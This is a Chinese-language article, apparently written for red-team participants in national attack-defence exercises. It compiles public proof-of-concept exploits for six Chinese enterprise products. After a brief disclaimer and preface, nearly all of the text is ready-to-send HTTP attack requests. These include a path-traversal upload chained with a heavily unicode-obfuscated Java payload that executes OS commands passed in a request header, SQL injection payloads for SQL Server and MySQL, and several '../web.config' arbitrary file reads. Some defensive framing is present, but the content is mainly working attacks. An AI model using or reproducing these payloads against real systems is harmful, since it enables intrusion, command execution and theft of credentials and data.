声明:无恶意引导,漏洞信息以及poc网上均已公开,此文章进行漏洞资源整合复盘,仅供师傅们参考。【前言】
小伙伴们一年一度的护网攻防即将开始,你们的实力提升如何了?是不是又在幻想要打穿哪家企业了?那就让蓝方工程师尝尝你们新的“绝招”吧。 在2024年护网攻防演练的硝烟散尽后,一组数据令人心惊:超过60%的企业靶标在24小时内被攻破,而攻击者最常用的武器竟是3个已公开修复的'旧漏洞'。
去年护网行动中,攻击者展现出前所未有的技术协同能力——从云原生架构的权限逃逸,到AI生成的钓鱼代码混淆检测,再到供应链漏洞的精准投毒,网络安全防线正面临多维度的撕裂。
本文结合一些实战案例,深度拆解2024年护网行动中高频出现的十大高危漏洞,揭露黑产团伙如何将漏洞武器化形成完整攻击链,并为企业的常态化防御提供关键决策参考。下一场攻防战来临前,你的安全水位线达标了吗?一、蓝凌EKP存在sys_ui_component远程命令执行漏洞POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host: Accept:application/json,text/javascript,*/*;q=0.01 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8 Connection:close Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 UserAgent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83. 0.4103.116Safari/537.36 X-Requested-With:XMLHttpRequest Content-Length: 395 ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="method" replaceExtend ------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="extendId" ../../../../resource/help/km/review/------WebKitFormBoundaryL7ILSpOdIhIIvL51 Content-Disposition:form-data;name="folderName" ../../../ekp/sys/common------WebKitFormBoundaryL7ILSpOdIhIIvL51-
POST /resource/help/km/review/dataxml.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Cmd: echo stctest
s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u006 5\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u 0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u006 7\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u 0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u002 9\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u 0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u007 2\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u 0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u006 1\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u 0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u006 4\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u 0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u007 2\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u 003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002 e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u 0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u002 0\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u 0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u002 0\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u 0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u007 4\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u 006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u006 7\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u 006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006 f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u 0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u006 9\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u 0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u002 0\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u 0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u006 4\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u 0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u007 2\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u 0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u002 0\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u 0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u002 0\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u 0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u007 3\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u 0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u002 9\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u 006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u002 0\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u 0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u 0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u006 4\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u 0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u007 8\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u 0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u007 3\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u 0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006 c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u 0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006 c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u 0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003 b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u 006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u006 2\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u 0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002 e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u 006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007 d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u 0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u002 0\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u 0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u006 5\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u 006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u007 4\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u 0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u002 8\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u 0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u006 5\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u 0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u007 3\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u 0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002 e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u 0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002 e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u 0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006 a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u 0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u002 0\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u 0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006 f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u 003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002 e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u 0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u002 2\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u 0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004 f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u 0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003 b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u 0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002 e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u 0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u002 0\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u 006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006 a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u 0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u006 5\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u 0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u 007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u002 9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u 0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006 d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u 003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002 e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u 0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002 e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u 0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006 c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u 0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u007 0\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u 007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u003 0\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u 0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u006 7\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u 002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u007 2\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u 0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006 e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u 006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u002 0\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u 0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u002 2\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u 0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u006 1\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u 0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006 e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u 0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u002 8\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u 0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u007 4\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u 0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u006 1\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u 0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u007 3\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u 0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u006 3\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u 0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005 c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u 0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u006 1\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u 0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u002 0\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u 0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u002 2\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u 0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u002 0\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u 0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u002 2\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u 0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u007 9\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u 003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006 e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u 0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u007 3\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u 0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u 0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u002 9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u 0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u007 3\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u 0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u006 5\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u 0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u007 4\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u 0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u002 0\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u 0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u007 0\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u 007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u006 8\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u 0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u002 9\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u 0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u002 8\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u 0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u002 0\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u 0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002 c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u 0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u006 9\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u 0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006 c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u 0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u006 4\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u 0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u002 9\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u 006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u006 2\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u 0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u002 9\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u 0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u006 1\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u 0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u002 0\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelNa me=test
二、亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞 POST /CDGServer3/NoticeAjax;Service HTTP/1.1 Host: Cookie: JSESSIONID=99CEC1B294F4EEEA7AFC46D8D4741917; JSESSIONID=06DCD58EDC037F785605A29CD7425C66 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 98 command=delNotice¬iceId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0: 3' --
三、天问物业ERP系统AreaAvatarDownLoad存在任意文件读取漏洞GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
四、赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞 GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1 Host: Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJ GXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl Priority: u=0, i User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,i mage/svg+xml,*/*;q=0.8 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1
五、赛蓝企业管理系统GetJSFile存在任意文件读取漏洞 GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close
六、数字通指尖云平台-智慧政务payslip SQL注入漏洞GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: GOASESSID=i589f58naalabocmbidup7edl3Upgrade-Insecure-Requests: 1
